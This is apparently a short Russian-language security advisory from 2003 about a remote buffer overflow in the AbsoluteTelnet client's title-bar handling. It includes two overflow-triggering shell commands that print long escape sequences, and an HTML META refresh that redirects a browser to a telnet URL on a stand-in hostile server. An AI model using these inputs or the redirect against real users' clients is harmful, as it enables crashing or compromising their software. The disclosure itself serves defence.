Security Lab

Удаленное переполнение буфера в AbsoluteTelnet

Дата публикации:10.02.2003
Всего просмотров:1139
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в AbsoluteTelnet. Удаленный атакующий может выполнить произвольный код с пользовательскими привилегиями.

Переполнение обнаружено в функции titlebar. Пример:

export KNUD=`perl -e 'print "A" x 174'`
echo -ne "\033]0;$KNUD\007"

export KNUD=`perl -e 'print "A" x 296'`
echo -ne "\033]0;$KNUD\007"
<pre>
Если AbsoluteTelnet клиент конфигурирован как telnet клиент по умолчанию, то уязвимость может использоваться через специально сформированную Web страницу. Пример: 
<pre>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=telnet://hostile.serv.er">
Уязвимость обнаружена в AbsoluteTelnet 2.00, 2.11 и устранена в 2.12 RC10
Ссылки: AbsoluteTelnet 2.00 buffer overflow.